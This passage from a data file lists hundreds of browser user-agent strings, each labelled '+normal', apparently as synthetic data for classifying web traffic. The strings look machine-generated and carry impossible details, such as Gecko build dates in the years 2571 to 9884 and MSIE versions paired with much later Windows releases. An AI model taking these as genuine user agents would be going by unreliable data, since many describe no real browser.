01:33:55.867313 Firefox/15.0' +normal,'Mozilla/5.0 (Linux; Android 3.2) AppleWebKit/531.1 (KHTML, like Gecko) Chrome/20.0.870.0 Safari/531.1' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Trident/3.0)' +normal,'Mozilla/5.0 (Windows NT 6.0; hy-AM; rv:1.9.0.20) Gecko/7331-05-19 12:39:01.434998 Firefox/8.0' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/5.1)' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_2 like Mac OS X) AppleWebKit/531.1 (KHTML, like Gecko) FxiOS/13.8w1672.0 Mobile/35V042 Safari/531.1' +normal,'Mozilla/5.0 (Windows; U; Windows NT 5.01) AppleWebKit/535.42.7 (KHTML, like Gecko) Version/4.1 Safari/535.42.7' +normal,'Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/4938-03-11 20:51:19.039215 Firefox/3.6.4' +normal,'Mozilla/5.0 (Linux; Android 1.6) AppleWebKit/534.0 (KHTML, like Gecko) Chrome/13.0.851.0 Safari/534.0' +normal,'Opera/8.30.(Windows NT 5.2; om-KE) Presto/2.9.185 Version/10.00' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/3.0)' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 14_2 like Mac OS X) AppleWebKit/535.2 (KHTML, like Gecko) CriOS/41.0.855.0 Mobile/20X281 Safari/535.2' +normal,'Mozilla/5.0 (Android 2.2.3; Mobile; rv:5.0) Gecko/5.0 Firefox/5.0' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 3_1_3 like Mac OS X) AppleWebKit/535.1 (KHTML, like Gecko) CriOS/33.0.878.0 Mobile/88G354 Safari/535.1' +normal,'Opera/8.98.(Windows NT 5.1; yue-HK) Presto/2.9.182 Version/12.00' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 6.1; Trident/5.0)' +normal,'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/534.25.4 (KHTML, like Gecko) Version/4.0.4 Safari/534.25.4' +normal,'Opera/9.39.(X11; Linux i686; pt-PT) Presto/2.9.184 Version/10.00' +normal,'Mozilla/5.0 (Android 3.2; Mobile; rv:64.0) Gecko/64.0 Firefox/64.0' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_10_1) AppleWebKit/533.0 (KHTML, like Gecko) Chrome/38.0.856.0 Safari/533.0' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_12_7) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/33.0.825.0 Safari/533.2' +normal,'Opera/9.88.(X11; Linux x86_64; af-ZA) Presto/2.9.177 Version/10.00' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_2 rv:5.0; tcy-IN) AppleWebKit/534.36.4 (KHTML, like Gecko) Version/4.0.5 Safari/534.36.4' +normal,'Mozilla/5.0 (Windows CE; ak-GH; rv:1.9.1.20) Gecko/6518-11-26 20:04:56.305695 Firefox/3.8' +normal,'Mozilla/5.0 (Android 4.0.4; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0' +normal,'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/5.1)' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/3.0)' +normal,'Opera/8.47.(Windows 95; nan-TW) Presto/2.9.161 Version/12.00' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1 like Mac OS X; ug-CN) AppleWebKit/534.40.3 (KHTML, like Gecko) Version/3.0.5 Mobile/8B111 Safari/6534.40.3' +normal,'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_11_4; rv:1.9.2.20) Gecko/9649-05-24 05:55:39.378937 Firefox/4.0' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2 like Mac OS X; mai-IN) AppleWebKit/533.5.7 (KHTML, like Gecko) Version/4.0.5 Mobile/8B111 Safari/6533.5.7' +normal,'Mozilla/5.0 (Android 3.2.2; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.01; Trident/5.0)' +normal,'Opera/8.53.(Windows NT 5.1; crh-UA) Presto/2.9.183 Version/11.00' +normal,'Opera/9.86.(X11; Linux i686; tk-TM) Presto/2.9.182 Version/10.00' +normal,'Opera/9.27.(Windows NT 6.0; bn-BD) Presto/2.9.188 Version/11.00' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3 rv:3.0; pt-PT) AppleWebKit/535.26.6 (KHTML, like Gecko) Version/5.1 Safari/535.26.6' +normal,'Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/8988-10-26 02:45:06.484314 Firefox/3.6.5' +normal,'Opera/8.60.(Windows NT 6.0; lo-LA) Presto/2.9.182 Version/10.00' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Trident/5.1)' +normal,'Mozilla/5.0 (Android 3.0; Mobile; rv:11.0) Gecko/11.0 Firefox/11.0' +normal,'Mozilla/5.0 (Windows NT 6.1; doi-IN; rv:1.9.2.20) Gecko/7221-05-20 08:53:54.547791 Firefox/7.0' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5 rv:2.0; dv-MV) AppleWebKit/533.17.5 (KHTML, like Gecko) Version/4.0.5 Safari/533.17.5' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_1) AppleWebKit/535.0 (KHTML, like Gecko) Chrome/45.0.822.0 Safari/535.0' +normal,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/53.0.815.0 Safari/534.2' +normal,'Opera/9.22.(X11; Linux x86_64; nan-TW) Presto/2.9.186 Version/11.00' +normal,'Mozilla/5.0 (Windows NT 4.0) AppleWebKit/531.1 (KHTML, like Gecko) Chrome/31.0.804.0 Safari/531.1' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3 rv:3.0; byn-ER) AppleWebKit/531.3.1 (KHTML, like Gecko) Version/4.0.4 Safari/531.3.1' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 7_1_2 like Mac OS X) AppleWebKit/536.2 (KHTML, like Gecko) CriOS/26.0.818.0 Mobile/05P359 Safari/536.2' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3 like Mac OS X) AppleWebKit/534.1 (KHTML, like Gecko) FxiOS/10.4c9576.0 Mobile/72X373 Safari/534.1' +normal,'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_6_4; rv:1.9.3.20) Gecko/4009-06-01 19:56:03.743881 Firefox/3.6.4' +normal,'Mozilla/5.0 (Android 5.0.1; Mobile; rv:54.0) Gecko/54.0 Firefox/54.0' +normal,'Mozilla/5.0 (Macintosh; PPC Mac OS X 10_7_7 rv:6.0; ha-NG) AppleWebKit/534.26.1 (KHTML, like Gecko) Version/5.0 Safari/534.26.1' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0; Trident/5.0)' +normal,'Mozilla/5.0 (Android 5.0.2; Mobile; rv:32.0) Gecko/32.0 Firefox/32.0' +normal,'Opera/8.95.(Windows 98; Win 9x 4.90; kok-IN) Presto/2.9.183 Version/11.00' +normal,'Mozilla/5.0 (Windows NT 6.1; fi-FI; rv:1.9.0.20) Gecko/3660-02-10 02:04:14.818375 Firefox/3.6.2' +normal,'Opera/8.80.(X11; Linux x86_64; ms-MY) Presto/2.9.189 Version/12.00' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0)' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3 like Mac OS X) AppleWebKit/531.1 (KHTML, like Gecko) FxiOS/9.6m4063.0 Mobile/59K613 Safari/531.1' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 4.0; Trident/4.0)' +normal,'Opera/8.79.(X11; Linux x86_64; ha-NG) Presto/2.9.175 Version/12.00' +normal,'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/531.2 (KHTML, like Gecko) Chrome/60.0.836.0 Safari/531.2' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.01; Trident/3.0)' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_2_1 like Mac OS X) AppleWebKit/533.2 (KHTML, like Gecko) FxiOS/12.3a9193.0 Mobile/31I674 Safari/533.2' +normal,'Mozilla/5.0 (Windows; U; Windows NT 5.01) AppleWebKit/535.3.3 (KHTML, like Gecko) Version/4.1 Safari/535.3.3' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 10.0; Trident/3.0)' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 12_4_8 like Mac OS X) AppleWebKit/535.0 (KHTML, like Gecko) FxiOS/16.9l2953.0 Mobile/64M660 Safari/535.0' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_6 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/17.0p9222.0 Mobile/26Y367 Safari/533.0' +normal,'Opera/9.93.(X11; Linux i686; cmn-TW) Presto/2.9.169 Version/12.00' +normal,'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/4.1)' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 4.0; Trident/5.1)' +normal,'Opera/9.42.(Windows NT 6.0; pap-CW) Presto/2.9.187 Version/11.00' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_5 like Mac OS X) AppleWebKit/536.1 (KHTML, like Gecko) CriOS/48.0.818.0 Mobile/41A416 Safari/536.1' +normal,'Opera/8.81.(Windows NT 5.1; ca-AD) Presto/2.9.175 Version/10.00' +normal,'Mozilla/5.0 (Linux; Android 2.3.6) AppleWebKit/535.0 (KHTML, like Gecko) Chrome/34.0.833.0 Safari/535.0' +normal,'Mozilla/5.0 (compatible; MSIE 8.0; Windows 98; Win 9x 4.90; Trident/4.0)' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.1)' +normal,'Mozilla/5.0 (Macintosh; PPC Mac OS X 10_7_2; rv:1.9.5.20) Gecko/5224-12-10 22:49:38.939102 Firefox/3.8' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows 95; Trident/5.1)' +normal,'Opera/9.53.(Windows NT 6.2; quz-PE) Presto/2.9.184 Version/11.00' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 3_3 like Mac OS X; ka-GE) AppleWebKit/535.30.7 (KHTML, like Gecko) Version/3.0.5 Mobile/8B117 Safari/6535.30.7' +normal,'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.1)' +normal,'Mozilla/5.0 (Linux; Android 7.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/36.0.877.0 Safari/535.1' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2 like Mac OS X; ne-NP) AppleWebKit/532.29.6 (KHTML, like Gecko) Version/4.0.5 Mobile/8B119 Safari/6532.29.6' +normal,'Mozilla/5.0 (Windows NT 4.0; tt-RU; rv:1.9.1.20) Gecko/6903-04-29 04:35:48.694061 Firefox/12.0' +normal,'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.1)' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_9_5 rv:4.0; as-IN) AppleWebKit/532.8.3 (KHTML, like Gecko) Version/4.0.1 Safari/532.8.3' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/4.1)' +normal,'Mozilla/5.0 (Windows NT 5.1; en-PH; rv:1.9.0.20) Gecko/6289-07-28 09:12:24.832748 Firefox/3.6.4' +normal,'Mozilla/5.0 (Android 1.0; Mobile; rv:11.0) Gecko/11.0 Firefox/11.0' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 3_0 like Mac OS X; raj-IN) AppleWebKit/532.16.2 (KHTML, like Gecko) Version/3.0.5 Mobile/8B112 Safari/6532.16.2' +normal,'Mozilla/5.0 (Linux; Android 2.3.3) AppleWebKit/531.2 (KHTML, like Gecko) Chrome/57.0.865.0 Safari/531.2' +normal,'Mozilla/5.0 (Linux; Android 1.6) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/19.0.893.0 Safari/532.0' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/536.0 (KHTML, like Gecko) CriOS/43.0.896.0 Mobile/51Y339 Safari/536.0' +normal,'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.01; Trident/4.0)' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/5.0)' +normal,'Opera/8.43.(X11; Linux x86_64; sk-SK) Presto/2.9.175 Version/10.00' +normal,'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/533.0 (KHTML, like Gecko) Chrome/53.0.815.0 Safari/533.0' +normal,'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.2; Trident/3.0)' +normal,'Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/532.41.7 (KHTML, like Gecko) Version/5.0 Safari/532.41.7' +normal,'Opera/8.15.(X11; Linux i686; uz-UZ) Presto/2.9.162 Version/12.00' +normal,'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_10_8 rv:3.0; wa-BE) AppleWebKit/531.34.7 (KHTML, like Gecko) Version/4.0.1 Safari/531.34.7' +normal,'Opera/8.66.(X11; Linux x86_64; iu-CA) Presto/2.9.174 Version/12.00' +normal,'Mozilla/5.0 (Macintosh; PPC Mac OS X 10_7_1; rv:1.9.3.20) Gecko/8881-10-07 21:15:05.528564 Firefox/5.0' +normal,'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/44.0.864.0 Safari/533.1' +normal,'Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/534.38.3 (KHTML, like Gecko) Version/5.0.1 Safari/534.38.3' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_9 rv:4.0; brx-IN) AppleWebKit/532.31.1 (KHTML, like Gecko) Version/5.0.5 Safari/532.31.1' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_4 like Mac OS X) AppleWebKit/532.1 (KHTML, like Gecko) CriOS/22.0.851.0 Mobile/87H684 Safari/532.1' +normal,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/533.0 (KHTML, like Gecko) Chrome/16.0.833.0 Safari/533.0' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0; Trident/4.1)' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1 rv:2.0; ti-ET) AppleWebKit/532.43.4 (KHTML, like Gecko) Version/5.0.3 Safari/532.43.4' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 7_1_2 like Mac OS X) AppleWebKit/531.0 (KHTML, like Gecko) CriOS/60.0.848.0 Mobile/11K634 Safari/531.0' +normal,'Mozilla/5.0 (Android 1.1; Mobile; rv:57.0) Gecko/57.0 Firefox/57.0' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_7) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/61.0.825.0 Safari/534.1' +normal,'Mozilla/5.0 (Windows 98; af-ZA; rv:1.9.2.20) Gecko/6250-05-25 23:29:04.071106 Firefox/3.8' +normal,'Mozilla/5.0 (Windows NT 5.2; mai-IN; rv:1.9.2.20) Gecko/2674-07-31 17:08:13.051685 Firefox/7.0' +normal,'Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/2571-12-05 14:55:41.370541 Firefox/3.8' +normal,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.0 (KHTML, like Gecko) Chrome/35.0.836.0 Safari/535.0' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3; rv:1.9.4.20) Gecko/8292-08-16 00:07:13.698944 Firefox/10.0' +normal,'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 4.0; Trident/4.0)' +normal,'Opera/8.44.(X11; Linux i686; is-IS) Presto/2.9.169 Version/12.00' +normal,'Opera/8.26.(X11; Linux i686; da-DK) Presto/2.9.180 Version/11.00' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 3_1_3 like Mac OS X) AppleWebKit/535.0 (KHTML, like Gecko) CriOS/47.0.857.0 Mobile/65I442 Safari/535.0' +normal,'Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/8896-02-11 14:50:00.213470 Firefox/14.0' +normal,'Opera/8.61.(Windows NT 5.2; rw-RW) Presto/2.9.162 Version/11.00' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 4_0 like Mac OS X; nr-ZA) AppleWebKit/534.6.3 (KHTML, like Gecko) Version/4.0.5 Mobile/8B113 Safari/6534.6.3' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows 98; Win 9x 4.90; Trident/5.0)' +normal,'Opera/9.33.(X11; Linux x86_64; nds-DE) Presto/2.9.160 Version/12.00' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows 98; Trident/5.0)' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_12_7; rv:1.9.3.20) Gecko/5629-01-10 16:45:47.192932 Firefox/3.6.16' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 4.0; Trident/3.0)' +normal,'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/29.0.830.0 Safari/534.1' +normal,'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/31.0.860.0 Safari/535.2' +normal,'Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/5373-03-02 04:42:18.551544 Firefox/3.8' +normal,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/531.1 (KHTML, like Gecko) Chrome/26.0.880.0 Safari/531.1' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 4_1 like Mac OS X; bo-IN) AppleWebKit/532.7.2 (KHTML, like Gecko) Version/3.0.5 Mobile/8B113 Safari/6532.7.2' +normal,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/21.0.886.0 Safari/532.1' +normal,'Mozilla/5.0 (Android 2.1; Mobile; rv:60.0) Gecko/60.0 Firefox/60.0' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 4_2_1 like Mac OS X) AppleWebKit/534.1 (KHTML, like Gecko) FxiOS/16.8p5191.0 Mobile/80J584 Safari/534.1' +normal,'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; Trident/3.0)' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows CE; Trident/3.0)' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows CE; Trident/3.0)' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/5.1)' +normal,'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/3.1)' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_6 like Mac OS X) AppleWebKit/531.1 (KHTML, like Gecko) CriOS/20.0.865.0 Mobile/39O070 Safari/531.1' +normal,'Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/533.25.4 (KHTML, like Gecko) Version/5.0.5 Safari/533.25.4' +normal,'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_10_7; rv:1.9.4.20) Gecko/7744-04-29 06:57:46.131531 Firefox/3.6.18' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_6 like Mac OS X) AppleWebKit/535.0 (KHTML, like Gecko) CriOS/57.0.866.0 Mobile/62F235 Safari/535.0' +normal,'Opera/9.41.(Windows NT 6.0; el-CY) Presto/2.9.170 Version/11.00' +normal,'Opera/8.32.(Windows NT 6.1; nso-ZA) Presto/2.9.164 Version/11.00' +normal,'Mozilla/5.0 (Linux; Android 3.2.6) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/58.0.819.0 Safari/535.2' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 4_1 like Mac OS X; mi-NZ) AppleWebKit/533.50.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B119 Safari/6533.50.2' +normal,'Mozilla/5.0 (Linux; Android 4.0.4) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/17.0.804.0 Safari/532.1' +normal,'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/4.1)' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2; Trident/3.0)' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 4.0; Trident/3.0)' +normal,'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/536.2 (KHTML, like Gecko) Chrome/20.0.819.0 Safari/536.2' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.1)' +normal,'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; Trident/5.1)' +normal,'Mozilla/5.0 (Linux; Android 8.0.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/43.0.837.0 Safari/535.1' +normal,'Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/9095-12-05 03:01:15.807526 Firefox/3.6.5' +normal,'Opera/8.36.(X11; Linux i686; rw-RW) Presto/2.9.167 Version/11.00' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 5_1_1 like Mac OS X) AppleWebKit/533.2 (KHTML, like Gecko) CriOS/28.0.813.0 Mobile/99E916 Safari/533.2' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2 rv:6.0; is-IS) AppleWebKit/535.27.4 (KHTML, like Gecko) Version/5.0.2 Safari/535.27.4' +normal,'Mozilla/5.0 (Windows NT 5.0; wa-BE; rv:1.9.1.20) Gecko/8378-03-14 18:18:53.065826 Firefox/3.6.3' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0 rv:2.0; shs-CA) AppleWebKit/532.29.3 (KHTML, like Gecko) Version/5.0.2 Safari/532.29.3' +normal,'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 10.0; Trident/5.1)' +normal,'Mozilla/5.0 (Macintosh; PPC Mac OS X 10_5_7 rv:6.0; hne-IN) AppleWebKit/534.36.3 (KHTML, like Gecko) Version/4.1 Safari/534.36.3' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 3_3 like Mac OS X; kw-GB) AppleWebKit/535.50.7 (KHTML, like Gecko) Version/4.0.5 Mobile/8B118 Safari/6535.50.7' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.1)' +normal,'Opera/9.91.(X11; Linux x86_64; ig-NG) Presto/2.9.165 Version/11.00' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows 98; Win 9x 4.90; Trident/5.0)' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_5 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/13.5d4109.0 Mobile/41G315 Safari/533.0' +normal,'Opera/9.22.(X11; Linux i686; ast-ES) Presto/2.9.164 Version/10.00' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2; Trident/4.1)' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 4_0 like Mac OS X; ko-KR) AppleWebKit/533.6.7 (KHTML, like Gecko) Version/3.0.5 Mobile/8B114 Safari/6533.6.7' +normal,'Mozilla/5.0 (Linux; Android 4.0.1) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/55.0.807.0 Safari/532.1' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows 98; Win 9x 4.90; Trident/5.0)' +normal,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/531.2 (KHTML, like Gecko) Chrome/63.0.862.0 Safari/531.2' +normal,'Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/3273-04-03 20:44:32.206963 Firefox/3.6.19' +normal,'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/31.0.814.0 Safari/533.1' +normal,'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/3.0)' +normal,'Mozilla/5.0 (Windows NT 5.01; br-FR; rv:1.9.0.20) Gecko/8377-05-14 13:18:27.463898 Firefox/3.8' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.1)' +normal,'Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_8) AppleWebKit/535.0 (KHTML, like Gecko) Chrome/61.0.874.0 Safari/535.0' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3 like Mac OS X; ca-AD) AppleWebKit/531.20.5 (KHTML, like Gecko) Version/3.0.5 Mobile/8B111 Safari/6531.20.5' +normal,'Mozilla/5.0 (Macintosh; PPC Mac OS X 10_7_7 rv:4.0; gez-ER) AppleWebKit/533.46.4 (KHTML, like Gecko) Version/5.1 Safari/533.46.4' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/3.1)' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 4_2_1 like Mac OS X) AppleWebKit/531.1 (KHTML, like Gecko) CriOS/57.0.863.0 Mobile/80K810 Safari/531.1' +normal,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/38.0.825.0 Safari/534.2' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_4 like Mac OS X) AppleWebKit/532.2 (KHTML, like Gecko) CriOS/14.0.841.0 Mobile/09K263 Safari/532.2' +normal,'Opera/9.72.(Windows NT 5.01; lt-LT) Presto/2.9.174 Version/12.00' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 4_2_1 like Mac OS X) AppleWebKit/531.2 (KHTML, like Gecko) CriOS/20.0.819.0 Mobile/71O426 Safari/531.2' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 14_2_1 like Mac OS X) AppleWebKit/531.1 (KHTML, like Gecko) CriOS/47.0.837.0 Mobile/39U668 Safari/531.1' +normal,'Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/534.3.1 (KHTML, like Gecko) Version/4.1 Safari/534.3.1' +normal,'Mozilla/5.0 (Windows CE; hr-HR; rv:1.9.1.20) Gecko/9884-03-01 07:01:34.195435 Firefox/3.6.15' +normal,'Mozilla/5.0 (Android 4.1; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_11_3 rv:6.0; lv-LV) AppleWebKit/535.42.2 (KHTML, like Gecko) Version/5.0.5 Safari/535.42.2' +normal,'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_8_1 rv:5.0; the-NP) AppleWebKit/535.5.2 (KHTML, like Gecko) Version/4.1 Safari/535.5.2' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_6 like Mac OS X) AppleWebKit/534.0 (KHTML, like Gecko) FxiOS/16.2o2817.0 Mobile/52K514 Safari/534.0' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 10.0; Trident/4.1)' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0)' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/3.1)' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_9_0; rv:1.9.4.20) Gecko/5337-09-10 10:05:58.112091 Firefox/3.8' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2; rv:1.9.2.20) Gecko/7377-07-07 01:16:09.369598 Firefox/7.0' +normal,'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 4.0; Trident/3.1)' +normal,'Mozilla/5.0 (Linux; Android 3.2.6) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/34.0.878.0 Safari/534.2' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 9_3_5 like Mac OS X) AppleWebKit/532.2 (KHTML, like Gecko) FxiOS/15.1u3908.0 Mobile/60O611 Safari/532.2' +normal,'Opera/8.27.(Windows NT 6.2; mt-MT) Presto/2.9.184 Version/11.00' +normal,'Opera/8.68.(Windows NT 5.0; nan-TW) Presto/2.9.172 Version/10.00' +normal,'Mozilla/5.0 (Linux; Android 2.0.1) AppleWebKit/536.1 (KHTML, like Gecko) Chrome/48.0.860.0 Safari/536.1' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.1)' +normal,'Opera/8.80.(Windows CE; ks-IN) Presto/2.9.172 Version/10.00' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/4.0)' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows CE; Trident/4.0)' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4; rv:1.9.5.20) Gecko/6898-06-01 03:15:13.466919 Firefox/3.8' +normal,'Opera/9.90.(Windows 95; mhr-RU) Presto/2.9.172 Version/10.00' +normal,'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_12_8 rv:3.0; ga-IE) AppleWebKit/534.40.2 (KHTML, like Gecko) Version/4.1 Safari/534.40.2' +normal,'Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/535.2 (KHTML, like 